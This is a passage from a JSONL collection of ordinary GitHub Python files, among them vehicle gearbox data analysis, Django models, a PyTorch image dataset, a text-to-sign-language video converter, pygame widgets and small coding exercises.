clutch_each_gear_ContTime.columns=['clutch_each_gear_ContTime']\n\n print(clutch_each_gear_count)\n print(clutch_each_gear_ContTime)\n\n Analy_9 = pd.concat([clutch_each_gear_count,clutch_each_gear_ContTime],axis=1) #axis=1 열방향으로 합치기\n print(Analy_9)\n\n ''' 8. 전체주행 거리 '''\n Analy_8= AnalySig['iom_Clu_Odometer'][len(AnalySig['iom_Clu_Odometer'])-1] - AnalySig['iom_Clu_Odometer'][0]\n Analy_8 = pd.DataFrame([Analy_8],index=['vehicle mileage'])\n print(Analy_8)\n\n\n ''' 7. 전체주행 시간 '''\n Analy_7 = AnalySig['time'][len(AnalySig['time'])-1]\n Analy_7 = pd.DataFrame([Analy_7], index=['vehicle drving time'])\n print(Analy_7)\n\n ''' 6. Brake On/Off 비율 '''\n brake_on = AnalySig[AnalySig['BrakeSwitchLocal']==\"BS_BrakeON\"]['BrakeSwitchLocal'].count()*0.01\n brake_off = AnalySig[AnalySig['BrakeSwitchLocal']==\"BS_BrakeOFF\"]['BrakeSwitchLocal'].count()*0.01\n Analy_6 = pd.Series([brake_on,brake_off],index=['brake on','brake off'])\n print(Analy_6)\n\n ''' 4. Slope 구간별 비율 : Slope '''\n Slope_interval = pd.cut(AnalySig['Slope'],[-20,-10,-5,-3,0,3,5,10,20], right=True, include_lowest=False,precision=2) # 1번인자 : 배열 / 2번인자 : 구간 / right : < A << / inclue_lowest = True 최소 값 포함 여부\n Analy_4 = AnalySig['Slope'].groupby([Slope_interval]).count()*0.01\n print(Analy_4)\n\n ''' 3. MCU Temp 그래프 / Max 온도 / 평균 온도 : iom_Mcu_MotTemp_C '''\n mcu_temp_max = AnalySig['iom_Mcu_MotTemp_C'].max()\n mcu_temp_mean = AnalySig['iom_Mcu_MotTemp_C'].mean()\n Analy_3 = pd.DataFrame([mcu_temp_mean,mcu_temp_max],index=['mcu_temp_mean','mcu_temp_max'])\n print(Analy_3)\n\n ''' 2. Select Direction 체결빈도(Odd H/L, Even H/L) '''\n odd_H_sel_count = []\n odd_L_sel_count = []\n even_H_sel_count = []\n even_L_sel_count = []\n i=0\n while i < len(AnalySig['gam_SelActPos1']):\n if AnalySig['gam_SelActPos1'][i] == 0:\n while True:\n i+=1\n if AnalySig['gam_SelActPos1'][i] == 7:\n odd_H_sel_count.append(1)\n break\n if i == len(AnalySig['gam_SelActPos1'])-1:\n break\n if AnalySig['gam_SelActPos1'][i] == 7:\n while True:\n i+=1\n if AnalySig['gam_SelActPos1'][i] == 0:\n odd_L_sel_count.append(1)\n break\n if i == len(AnalySig['gam_SelActPos1'])-1:\n break\n i+=1\n\n i=0\n while i < len(AnalySig['gam_SelActPos2']):\n if AnalySig['gam_SelActPos2'][i] == 0:\n while True:\n i+=1\n if AnalySig['gam_SelActPos2'][i] == 7:\n even_H_sel_count.append(1)\n break\n if i == len(AnalySig['gam_SelActPos2'])-1:\n break\n if AnalySig['gam_SelActPos2'][i] == 7:\n while True:\n i+=1\n if AnalySig['gam_SelActPos2'][i] == 0:\n even_L_sel_count.append(1)\n break\n if i == len(AnalySig['gam_SelActPos2'])-1:\n break\n i+=1\n\n Analy_2 = pd.DataFrame([len(odd_L_sel_count),len(odd_H_sel_count),len(even_L_sel_count),len(even_H_sel_count)],\n index=['odd_L_sel_count', 'odd_H_sel_count', 'even_L_sel_count', 'even_H_sel_count'])\n print(Analy_2)\n\n ''' 1. Shift Gear 체결빈도 \n [Search 방법]\n : gN이 아닐 영역을 sorting하고 첫번째 값은 저장하고 이후, index 값이 연속적이지 않을 경우의 i+1 값을 저장함. \n '''\n\n sfcon_odd = AnalySig[(AnalySig['rbm_TTCur']==2) & (AnalySig['gbm_ActGearOdd']!='gN')]\n sfcon_even = AnalySig[(AnalySig['rbm_TTCur']==2) & (AnalySig['gbm_ActGearEven']!='gN')]\n odd_shift_change_gear = []\n even_shift_change_gear = []\n i=0\n while i < len(sfcon_odd['gbm_ActGearOdd'])-1:\n if i==0:\n odd_shift_change_gear.append(sfcon_odd['gbm_ActGearOdd'].iloc[i])\n if sfcon_odd.index[i+1] !=sfcon_odd.index[i]+1:\n odd_shift_change_gear.append(sfcon_odd['gbm_ActGearOdd'].iloc[i+1])\n i+=1\n\n i=0\n while i < len(sfcon_even['gbm_ActGearEven'])-1:\n if i==0:\n even_shift_change_gear.append(sfcon_even['gbm_ActGearEven'].iloc[i])\n if sfcon_even.index[i+1] !=sfcon_even.index[i]+1:\n even_shift_change_gear.append(sfcon_even['gbm_ActGearEven'].iloc[i+1])\n i+=1\n\n odd_shift_change_gear_collection = collections.Counter(odd_shift_change_gear)\n odd_shift_change_gear_collection = pd.DataFrame.from_dict([odd_shift_change_gear_collection]).T\n\n even_shift_change_gear_collection = collections.Counter(even_shift_change_gear)\n even_shift_change_gear_collection = pd.DataFrame.from_dict([even_shift_change_gear_collection]).T\n\n all_shift_change_gear_collection = pd.concat([odd_shift_change_gear_collection,even_shift_change_gear_collection],axis=0).sort_index(axis=0)\n all_shift_change_gear_collection.columns=['Shift Gear Chanage Count']\n Analy_1 = all_shift_change_gear_collection\n print(Analy_1)\n\n\n print(Analy_1.shape[0], type(Analy_1.shape[0]))\n print(Analy_1.shape[1], type(Analy_1.shape[1]))\n\n\n Analy = [Analy_1,Analy_2,Analy_3,Analy_4,Analy_6,Analy_7,Analy_8,Analy_9,Analy_10,Analy_12,Analy_13,Analy_14,Analy_15]\n\n ''' export excel '''\n fd_environment_Analy = Analy\n\n return (fd_environment_Analy)","repo_name":"pakgily/diagnosis_2021_0804","sub_path":"fd_environment_210824.py","file_name":"fd_environment_210824.py","file_ext":"py","file_size_in_byte":10924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12640986013","text":"# 4. Задайте список из N элементов, заполненных числами из промежутка [-N, N].\n# Найдите произведение элементов на указанных позициях.\n# Позиции хранятся в файле file.txt в одной строке одно число.\n\ndef create_list(number):\n list_of_numbers = [x for x in range(-number, number + 1)]\n print(list_of_numbers)\n multy = 1\n\n with open('file.txt', 'r') as rn:\n positions = rn.readlines()\n for position in positions:\n position = int(position.replace('\\n', ''))\n multy *= list_of_numbers[position]\n print(f'Позиция => {position}, значение => {list_of_numbers[position]}')\n return multy\n\nn = int(input('Введите число: '))\nprint(f'Произведение => {create_list(n)}')\n\n","repo_name":"EkaterinaGaraeva/python_homework2_3","sub_path":"Task004.py","file_name":"Task004.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18733112558","text":"def solution(s):\n answer=[]\n if len(s)==1:\n return 1\n else:\n for i in range(1,len(s)//2+1):\n text,cnt,idx=\"\",1,0\n while idx<(len(s)-len(s)%i):\n if s[idx:idx+i]==s[idx+i:idx+i*2]:\n cnt+=1\n else:\n text+=str(\"\" if cnt<=1 else cnt)+s[idx:idx+i]\n cnt=1\n idx+=i\n text+=s[idx:]\n answer.append(len(text))\n return min(answer)\n\n\n\nprint(solution(\"aabbaccc\"))\n","repo_name":"beOk91/programmers","sub_path":"level2/problem60057.py","file_name":"problem60057.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18328818915","text":"import torch\nimport random\nimport torch.utils.data as data\nimport os\nfrom PIL import Image\nimport pandas as pd\nimport numpy as np\n\ndef correct_mask(mask):\n '''\n Replace 127 with 0 for cropping purposes\n '''\n mask_arr = np.array(mask)\n mask_arr[mask_arr==127]=0\n return Image.fromarray(mask_arr)\n\nclass ClassifDataset(data.Dataset):\n def __init__(self, data_dir,mode = 'df_tagging_roof_material_type',crop_alpha=True, frac = 1, transform=None):\n \n def get_df(dirr,frac=frac): \n df_base = pd.read_csv(dirr+'/''newroof.csv')\n df = df_base[df_base['fold_mode']==mode]\n df = df.sample(frac=frac, random_state=1,replace = False)\n return df\n\n super(ClassifDataset, self).__init__()\n self.data_dir = os.path.expanduser(data_dir)\n self.df = get_df(self.data_dir)\n self.transform = transform\n self.crop_alpha = crop_alpha\n self.classes = ['hippedRoof',\n 'gabledRoof',\n 'flatRoof',\n 'monopitchRoof',\n 'pyramidalRoof',\n 'copulaRoof',\n 'halfHippedRoof',\n 'archRoof',\n 'mansardRoof'\n ]\n\n def __getitem__(self, index, color_format='RGB'):\n\n element = self.df.iloc[index]\n label_name = element['img_fn']+ '.png'\n complete_path = os.path.join(self.data_dir,label_name)\n img_4c = Image.open(complete_path)\n \n if self.crop_alpha:\n alpha = correct_mask(img_4c.getchannel('A'))\n bbox = alpha.getbbox()\n img_4cc = img_4c.crop(bbox)\n\n else:\n img_4cc = img_4c\n\n\n img_4cc.load()\n img = Image.new(color_format, img_4cc.size, (0,0,0))\n img.paste(img_4cc,mask=img_4cc.split()[3] if self.crop_alpha else None)\n \n\n class_str = element['roof_type']\n class_idx = self.classes.index(class_str)\n \n if self.transform is not None:\n img = self.transform(img)\n \n return img,class_idx\n\n def __len__(self):\n return self.df.shape[0]\n\n\nif __name__ == '__main__':\n from transforms import TransformsClassification\n import matplotlib.pyplot as plt\n trainset_classif = ClassifDataset('../new_dataset',mode='training',transform = TransformsClassification(244,'training'), frac = 1.)\n X = torch.zeros((9))\n for i in range(len(trainset_classif)):\n x,y = trainset_classif.__getitem__(i)\n #X[y] +=1/len(trainset_classif)\n plt.imshow(x.permute(1,2,0))\n #plt.title(trainset_classif.classes[y])\n plt.show()\n if i==10:\n break\n print(1/X)","repo_name":"SylvainGavoille/datascience","sub_path":"byol_finetuning/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20304849806","text":"# import numpy as np\n#\n# arr = np.array([1, 2, 8, 4, 5])\n# value = 0\n#\n# absolute_val_array = np.abs(arr - value)\n# smallest_difference_index = absolute_val_array.argmin()\n# closest_element = arr[smallest_difference_index]\n#\n# print(\"Closest element to\" ,value, \"is:\", closest_element)\n\n# N = 5\n# A = [5,4,1,2,3,9]\n# No = 0\n#\n# new = []\n# A.sort()\n#\n# for items in A:\n# D = abs(items-No )\n# new.append(D)\n#\n# print(new[0])\n\nmylist = [1, 2, 3, 4, 5, 6, 7, 9, 10]\nmynumber = int(input(\"enter num : \"))\n\ndef closest(list, Number):\n temp = []\n for i in list:\n temp.append(abs(Number-i))\n\n return temp.index(min(temp))\n\na = closest(mylist, mynumber)\nprint (\"index is : \",a)\nprint (\"Closet value is : \",mylist[a])","repo_name":"RautelaZone/old_stuff_2021","sub_path":"Python Stuff/Python_Programs/Most Common Programs/ClosestToNumber.py","file_name":"ClosestToNumber.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8280046777","text":"from django import forms\r\nfrom django.db import models \r\nfrom datetime import datetime, date\r\nfrom django.contrib.auth.models import User\r\n\r\nINFO = 1\r\nWARN = 2\r\nFIRE = 3\r\n\r\nSTATUS_CHOICES = (\r\n (INFO, 'Informational'),\r\n (WARN, 'Warning'),\r\n (FIRE, 'Critical'),\r\n)\r\n\r\n# MF_CHOICES display names are available to the templates via \r\n# the helper method as such: {{ object.get_mf_area_display }}\r\nMF_CHOICES = (\r\n (u'ad', u'Adabas'),\r\n (u'br', u'Broker'),\r\n (u'cp', u'Com-plete'),\r\n (u'vp', u'VPS'),\r\n (u'pp', u'PPS'),\r\n (u'pr', u'Printer'),\r\n (u'ot', u'Other'),\r\n)\r\n\r\nclass Log(models.Model): \r\n title = models.CharField(max_length=\"30\",unique=True) \r\n created = models.DateTimeField(default=datetime.now, editable=False)\r\n updated = models.DateTimeField(default=datetime.now, editable=False)\r\n eventTime = models.DateTimeField(default=datetime.now)\r\n notes = models.TextField()\r\n area = models.ForeignKey('Area', verbose_name='Type of log') # This is required as it will help us to group the logs\r\n status = models.IntegerField(choices=STATUS_CHOICES, default=INFO) \r\n alarm = models.ForeignKey('Alarm', blank=True, null=True) # Foreign Key is the alarm which might be associated with this event\r\n facility = models.ForeignKey('Facility', blank=True, null=True, verbose_name='facility area') \r\n created_by = models.ForeignKey(User, editable=False)\r\n mf_area = models.CharField(max_length=2,choices=MF_CHOICES, blank=True, verbose_name='mainframe area')\r\n\r\n def save(self):\r\n if not self.id:\r\n self.created = datetime.today()\r\n self.updated = datetime.today()\r\n super(Log, self).save() \r\n\r\n def __unicode__(self):\r\n return self.notes\r\n\r\nclass Update(models.Model):\r\n\tcreated = models.DateTimeField(default=datetime.now, editable=False)\r\n\tcreated_by = models.ForeignKey(User, editable=False)\r\n\tnotes = models.TextField()\r\n\tlog = models.ForeignKey('Log', editable=False)\r\n\r\n\r\n# @models.permalink\r\n# def get_absolute_url(self):\r\n# return ('system-display', (), {'object_id': self.id})\r\n\r\nclass Alarm(models.Model):\r\n name = models.CharField(max_length=\"30\",unique=True)\r\n description = models.TextField(blank=True) \r\n\r\n def __unicode__(self):\r\n return self.name\r\n\r\nclass Area(models.Model):\r\n name = models.CharField(max_length=\"30\",unique=True)\r\n description = models.TextField(blank=True) \r\n\r\n def __unicode__(self):\r\n return self.name\r\n\r\nclass Facility(models.Model):\r\n name = models.CharField(max_length=\"30\",unique=True)\r\n description = models.TextField(blank=True) \r\n\r\n def __unicode__(self):\r\n return self.name\r\n\r\nclass AuthorForm(forms.Form):\r\n name = forms.CharField(max_length=100)\r\n title = forms.CharField(max_length=3, widget=forms.Select(choices=STATUS_CHOICES))\r\n choice_field = forms.ChoiceField(widget=forms.RadioSelect, choices=STATUS_CHOICES)\r\n birth_date = forms.DateField(required=False)","repo_name":"Dist-Systems/dclog","sub_path":"dclog/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15395847286","text":"#!/usr/bin/env python3\n\nimport ldfutils.connection\nimport ldfutils.dbtypes as lm\nimport ldfutils.dbloader\nimport ldfutils.utils as ut\nimport ldfutils.solutions_processing as sp\nimport sys\nfrom optparse import OptionParser\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncmd_line_parser = OptionParser()\nldfutils.connection.add_connection_settings_to_option_parser(cmd_line_parser)\n\ncmd_line_parser.add_option(\"-b\", \"--begin\", dest=\"begin_time\", default=\"2014-05-01 00:00:00\",\n help=\"Start time for extracting\", metavar=\"yyyy-mm-dd hh:mm:ss\")\n\ncmd_line_parser.add_option(\"-e\", \"--end\", dest=\"end_time\", default=\"2017-05-01 00:00:00\",\n help=\"End time for extracting\", metavar=\"yyyy-mm-dd hh:mm:ss\")\n\n(cmd_line_options, cmdLineArgs) = cmd_line_parser.parse_args()\n\nsettings = {}\n\nldfutils.connection.setup_connection_settings(\n settings,\n cmd_line_options.connection_settings,\n cmd_line_options.password\n)\n\ntry:\n conn, cursor = ldfutils.connection.create_connection_and_cursor(settings)\n\n print(\"Loading time clusters...\")\n clusters = ldfutils.dbloader.load_time_clusters(\n cursor,\n ut.ConditionGenerator.round_time_interval(cmd_line_options.begin_time, cmd_line_options.end_time)\n )\n\n used_strikes = {}\n total_used_strikes_with_repetition = 0\n\n print(\"Counting used strikes...\")\n for cluster in clusters:\n for strike in cluster.strikes:\n total_used_strikes_with_repetition += 1\n if strike not in used_strikes:\n used_strikes[strike] = 1\n else:\n used_strikes[strike] += 1\n\n unique_strikes = len(used_strikes)\n\n print(\"Unique strikes: \" + str(unique_strikes) + \"; total used: \" + str(total_used_strikes_with_repetition))\n print(\"Part: \" + str(float(unique_strikes)/total_used_strikes_with_repetition))\nfinally:\n cursor.close()\n conn.close()\n","repo_name":"DAlexis/open-lds","sub_path":"legacy/python-processing/test_shared_strikes.py","file_name":"test_shared_strikes.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22565361878","text":"\nfrom rest_framework import serializers\nfrom company.models import FuelMaster,Invoice, MeterReading, VatMaster\nfrom shared_tenant.models import Company, Employee\nfrom django.db.models import Q\nfrom shared_tenant.serielizer import EmployeeSerializer\n\n\n\n\n\nclass InvoiceGenerateSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = Invoice\n fields = '__all__'\n # fields = ('id', 'invoice_no','gross_amt','fuel','qty','type' )\n \n \n \n def save(self):\n last_invoice = Invoice.objects.filter(Q(type=2) ).order_by('id').last()\n print(\"last invoice\",last_invoice.invoice_no)\n if not last_invoice:\n new_invoice_int= 1\n else:\n invoice_no = last_invoice.invoice_no\n invoice_int = int(invoice_no)\n new_invoice_int = invoice_int + 1\n \n print(last_invoice)\n print(\"New invocie number\",new_invoice_int)\n print(self.validated_data)\n\n emp=Employee.objects.get(user=self.context['request'].user)\n \n invoice = Invoice(\n **self.validated_data,\n invoice_no=new_invoice_int,\n emp = Employee.objects.get(user=self.context['request'].user),\n company = Company.objects.get(id=emp.company_id) \n )\n invoice.save() \n self.instance = invoice\n return self.instance\n \n \n\n\nclass MeterCreateSerializer(serializers.ModelSerializer):\n class Meta:\n model = MeterReading\n fields = '__all__'\n \n\n def save(self):\n emp=Employee.objects.get(user=self.context['request'].user)\n\n meter_reading = MeterReading(\n **self.validated_data,\n company =Company.objects.get(id=emp.company_id) \n )\n meter_reading.save()\n return meter_reading\n\nclass MeterSerializer(serializers.ModelSerializer):\n class Meta:\n model = MeterReading\n fields = '__all__'\n\n\n","repo_name":"Cilive/skysoft_backend","sub_path":"employee/serielizer.py","file_name":"serielizer.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22099973047","text":"# Packages\nimport nltk\nnltk.download('punkt')\nfrom nltk import word_tokenize\n#import useless_words\nfrom nltk.stem import PorterStemmer\nimport time\nfrom shutil import copyfile\nfrom difflib import SequenceMatcher\nfrom selenium import webdriver\nimport shutil, sys # for the copyfile\n\nimport shlex\nimport subprocess\nimport os\n#from os import startfile\n\n\n# CONSTANTS \nSIGN_PATH = \"C:\\\\Users\\\\고준원\\\\Downloads\\\\Text_to_sign_language\" ## Your local work folder\n# SIGN_PATH = os.getcwd()\nDOWN_PATH = \"C:\\\\Users\\\\고준원\\\\Downloads\" ## Your local downloads folder\n# DOWN_PATH = os.pardir + '/Results'\n\nDOWNLOAD_WAIT = 7\nSIMILIARITY_RATIO = 0.9\nuselesswords = ['is', 'the', 'are', 'am', 'a', 'it', 'was', 'were', 'an', ',', '.', '?', '!']\n\n# Get words\ndef download_word_sign(word):\n # Download Firefox browser\n # os.path.abspath(os.getcwd())\n browser = webdriver.Chrome(os.path.abspath(os.getcwd()) + '/chromedriver') ## Downloaded Chrome driver AT YOUR WORK FOLDER\n browser.get(\"http://www.aslpro.com/cgi-bin/aslpro/aslpro.cgi\")\n first_letter = word[0]\n letters = browser.find_elements_by_xpath('//a[@class=\"sideNavBarUnselectedText\"]')\n for letter in letters:\n if first_letter == str(letter.text).strip().lower():\n letter.click()\n time.sleep(2)\n break\n\n # Show drop down menu ( Spinner )\n spinner = browser.find_elements_by_xpath(\"//option\")\n best_score = -1.\n closest_word_item = None\n for item in spinner:\n item_text = item.text\n # if stem == str(item_text).lower()[:len(stem)]:\n s = similar(word, str(item_text).lower())\n if s > best_score:\n best_score = s\n closest_word_item = item\n print(word, \" \", str(item_text).lower())\n print(\"Score: \" + str(s)) \n if best_score < SIMILIARITY_RATIO:\n print(word + \" not found in dictionary\")\n ### HERE\n ## 1. Alphabet video\n\n ## 2. Alphabet picture\n browser.close()\n return (\"_\" + word.lower())\n real_name = str(closest_word_item.text).lower()\n\n print(\"Downloading \" + real_name + \"...\")\n closest_word_item.click()\n time.sleep(DOWNLOAD_WAIT)\n in_path = DOWN_PATH + \"/\" + real_name + \".swf\" ## your local downloads\n out_path = SIGN_PATH + \"/\" + real_name + \".mp4\"\n convert_file_format(in_path, out_path)\n browser.close()\n return real_name\n\ndef convert_file_format(in_path, out_path):\n # Converts .swf filw to .mp4 file and saves new file at out_path\n from ffmpy import FFmpeg\n ## please download ffmpeg AT YOUR WORK FOLDER\n\n ff = FFmpeg(executable=SIGN_PATH + \"/ffmpeg/bin/ffmpeg.exe\",\n inputs = {in_path: None},\n outputs = {out_path: None})\n ff = FFmpeg(inputs = {in_path: None}, outputs= {out_path: None})\n ff.run()\n\ndef get_words_in_database():\n import os\n vids = os.listdir(SIGN_PATH)\n vid_names = [v[:-4] for v in vids]\n return vid_names\n\ndef process_text(text):\n ##print(\"text here \", text)\n \n # Split sentence into words\n words = word_tokenize(text)\n ##print(\"token words here\", words)\n\n # Remove all meaningless words\n ##print(\"uselesswords : \", uselesswords)\n usefull_words = [str(w).lower() for w in words if w.lower() not in uselesswords]\n ##print(\"useless deleted\", usefull_words)\n \n return usefull_words\n\ndef merge_signs_first(words):\n # Write a text file containing all the paths to each video\n with open(SIGN_PATH + \"/vidlist.txt\", 'w') as f:\n for w in words:\n global PLAY_VIDEO\n if(w != None):\n f.write(\"file '\" + SIGN_PATH + \"/\" + w + \".mp4'\\n\")\n PLAY_VIDEO = True\n elif(w[0] == '_'):\n for i in range(1, len(w)):\n f.write(\"file '\" + SIGN_PATH + \"/\" + w[i] + \".mp4'\\n\")\n PLAY_VIDEO = True\n else:\n PLAY_VIDEO = False\n\n # Splits the command into pieces in order to feed the command line\n # command not working, we don't have a output\n # Command looks like : ffmpeg -f concat -i videolist.txt -c copy output.mp4\n command = \"ffmpeg -f concat -safe 0 -i vidlist.txt -c copy output.mp4 -y\"\n \n args = shlex.split(command)\n \n #print(\"@@@ shlex splited into\\n\", args, \"\\n\")\n\n env = {'PATH': SIGN_PATH + '/ffmpeg/bin'}\n # env = {'PATH': SIGN_PATH + '\\\\ffmpeg\\\\bin' + SIGN_PATH + '\\\\SignToSignLang'} # ffmpeg 인식안됨\n # env = os.environ # ffmpeg 인식안됨\n # env = {'PATH': os.getenv('PATH')} # ffmpeg 인식안됨\n process = subprocess.Popen(args, shell=True, env=env)\n\n process.wait()\n\n ## copyfile(src, dst)\n shutil.copyfile(SIGN_PATH + \"/output.mp4\", SIGN_PATH + \"/outputs.mp4\")\n\ndef merge_signs(words):\n # Write a text file containing all the paths to each video\n with open(SIGN_PATH + \"/vidlist.txt\", 'w') as f:\n for w in words:\n global PLAY_VIDEO\n if(w != None):\n f.write(\"file '\" + SIGN_PATH + \"/\" + w + \".mp4'\\n\")\n PLAY_VIDEO = True\n elif(w[0] == '_'):\n for i in range(1, len(w)):\n f.write(\"file '\" + SIGN_PATH + \"/\" + w[i] + \".mp4'\\n\")\n PLAY_VIDEO = True\n else:\n PLAY_VIDEO = False\n\n # Splits the command into pieces in order to feed the command line\n # command not working, we don't have a output\n # Command looks like : ffmpeg -f concat -i videolist.txt -c copy output.mp4\n command = \"ffmpeg -f concat -safe 0 -i vidlist.txt -c copy output.mp4 -y\"\n \n args = shlex.split(command)\n \n #print(\"@@@ shlex splited into\\n\", args, \"\\n\")\n\n env = {'PATH': SIGN_PATH + '/ffmpeg/bin'}\n # env = {'PATH': SIGN_PATH + '\\\\ffmpeg\\\\bin' + SIGN_PATH + '\\\\SignToSignLang'} # ffmpeg 인식안됨\n # env = os.environ # ffmpeg 인식안됨\n # env = {'PATH': os.getenv('PATH')} # ffmpeg 인식안됨\n process = subprocess.Popen(args, shell=True, env=env)\n\n process.wait()\n \n # Now, concat output next to out(which will be a video for whole sentences)\n command = \"ffmpeg -f concat -safe 0 -i concatoutput.txt -c copy outputs_temp.mp4 -y\"\n args = shlex.split(command)\n env = {'PATH': SIGN_PATH + '/ffmpeg/bin'}\n process = subprocess.Popen(args, shell=True, env=env)\n process.wait()\n\n ## copyfile(src, dst)\n shutil.copyfile(SIGN_PATH + \"/outputs_temp.mp4\", SIGN_PATH + \"/outputs.mp4\")\n\ndef in_database(w):\n db_list = get_words_in_database()\n from nltk.stem import PorterStemmer\n ps = PorterStemmer()\n s = ps.stem(w)\n for word in db_list:\n if s == word[:len(s)]:\n return True\n return False\n\ndef similar(a, b):\n # Returns a decimal representing the similiarity between the two strings.\n return SequenceMatcher(None, a, b).ratio()\n\ndef find_in_db(w):\n best_score = -1.\n best_vid_name = None\n for v in get_words_in_database():\n s = similar(w, v)\n if best_score < s:\n best_score = s\n best_vid_name = v\n if best_score > SIMILIARITY_RATIO:\n return best_vid_name\n\ndef convert_to_video():\n ## MAIN STARTS\n ## text 받는 부분부터 for loop 으로 txt 파일을 읽어오면 전체 텍스트에 대해 실행 가능.\n # Get the text which is going to become ASL\n # f = open(SIGN_PATH + \"\\\\disfluency_remover_result.txt\", 'r')\n text_path = os.pardir + '/Results/disfluency_remover_result.txt'\n print(\"text_path\")\n print(text_path)\n f = open(text_path, 'r')\n input_lines = f.readlines()\n f.close()\n\n print(\"### Whole text is \", input_lines)\n\n i = 0\n\n for text in input_lines:\n print(\"\\n### Now we are translating [ \" + text +\" ]\")\n\n # Process text\n words = process_text(text)\n\n print(\"words here\", words)\n\n # Download words that have not been downloaded in previous sessions.\n print(\"\\n### Check if we already have video in DB\")\n real_words = []\n for w in words:\n real_name = find_in_db(w)\n if real_name:\n print(\" ->\" + w + \" is already in db as \" + real_name)\n real_words.append(real_name)\n else:\n real_words.append(download_word_sign(w))\n if real_words[-1][0] == '_':\n word_not_exist = real_words.pop()\n for i in range(1, len(word_not_exist)):\n real_words.append(word_not_exist[i])\n\n words = real_words\n print(\"### DB check done\\n\")\n\n # print(\"@@@ What words video gonna merge?\\n\", words, \"\\n\")\n\n # Concatenate videos and save output video to folder\n if i == 0:\n print(\"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\")\n merge_signs_first(words)\n i = 1\n else:\n print(\"####################################\")\n merge_signs(words)\n\n # Finally make out.mp4\n shutil.copyfile(SIGN_PATH + \"/outputs.mp4\", SIGN_PATH + \"/out.mp4\")\n\n # Play the video\n if(PLAY_VIDEO == True):\n os.startfile(SIGN_PATH + \"/out.mp4\")\n","repo_name":"jjungkang2/CS470-teamproject","sub_path":"Text_to_sign_language/TextToSignLanguage.py","file_name":"TextToSignLanguage.py","file_ext":"py","file_size_in_byte":9130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9853683328","text":"data,lookup,pe,commons,framehost,FID=None,None,None,None,None,None\ndef verify():\n return \"app\"\ndef init(dataV,lookupV):\n global data,lookup,commons,pe,framehost,FID\n data = dataV\n lookup = lookupV\n class commonsV():\n icon = data.files + \"reddy/icons/tch.png\"\n window_size = (500,100)\n window_type = 0\n window_pos = (data.mS[0]/2-250,data.mS[1]/2-50)\n title = \"Testing Chaimber!\"\n commons = commonsV\n pe = lookup.get(\"PGE\")\n framehost = lookup.get(\"FHost\")\n FID = framehost.setup(\"tchINFO\", commons)\n return \"tchINFO\", 8, 2\ncalls = 0\ndef draw():\n global calls\n framehost.draw(FID)\n framehost.screen(FID)\n pe.fill.full(pe.color.white)\n pe.text.display(pe.text.make(\"The System modules were restarted!\", 'freesansbold.ttf', 25, pe.math.center((0,0,500,100)), (pe.color.black, None)))\n framehost.exit(FID)\n calls+=1\n if calls >= 100:\n framehost.close(FID)\n data.operations.append(\"run reddy/apps/testingChaimber.py\")","repo_name":"JustRedTTG/REDdyOS","sub_path":"REDdyOS/system/reddy/apps/testingChaimber_resetinfo.py","file_name":"testingChaimber_resetinfo.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"32049500168","text":"import pygame\nclass Text(object):\n def __init__(self, string, color = [255, 255, 255], size = 8, scrollable = False, bold=False):\n ## Render the font into a blittable surface\n if bold:\n self.font = pygame.font.Font('res/fon/bold.ttf', size)\n else:\n self.font = pygame.font.Font('res/fon/font.ttf', size)\n self.color = color\n self.text = string\n self.current = len(string) if not scrollable else 0\n self.scrollable = scrollable\n self.height = self.font.get_height()\n self.renderable = self.font.render(self.text[:self.current], False, self.color)\n self.shadow = self.font.render(self.text[:self.current], False, (38,38,38))\n self.width = self.renderable.get_width()\n\n def draw(self, surface, pos = (0, 0)):\n if self.scrollable:\n ## Blit an animated version of the text\n surface.blit(self.shadow, (pos[0]+1,pos[1]+1))\n surface.blit(self.renderable, pos)\n self.current = min(len(self.text), self.current+1)\n self.update()\n else:\n ## Blit the rendered text at the given position\n surface.blit(self.shadow, (pos[0]-1,pos[1]))\n surface.blit(self.shadow, (pos[0]+1,pos[1]))\n surface.blit(self.shadow, (pos[0],pos[1]+1))\n surface.blit(self.shadow, (pos[0], pos[1]-1))\n surface.blit(self.renderable, pos)\n\n def update(self, string=None, color=[255,255,255]):\n if self.scrollable:\n ## Animated text\n text = self.text[:self.current]\n self.renderable = self.font.render(text, False, (38,38,38))\n self.shadow = self.font.render(text, False, (144,144,144))\n self.width = self.renderable.get_width()\n ## Update the string only if the text is new\n elif string != None and string != self.text:\n self.text = string\n self.renderable = self.font.render(self.text, False, color)\n self.shadow = self.font.render(self.text, False, (38,38,38))\n self.width = self.renderable.get_width()\n","repo_name":"josephnavarro/space-strategy","sub_path":"text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71075308267","text":"import random\n# Board Space object\nclass BoardSpace(object):\n def __init__(self):\n self.status = 0\n self.revealed = False\n\n\n# Board object\nclass Board(object):\n def __init__(self, rows, cols, m_count):\n self.rows = rows\n self.cols = cols\n self.revealedCount = 0\n self.mines = m_count\n self.gameOver = False\n self.gameWon = False\n self.board = 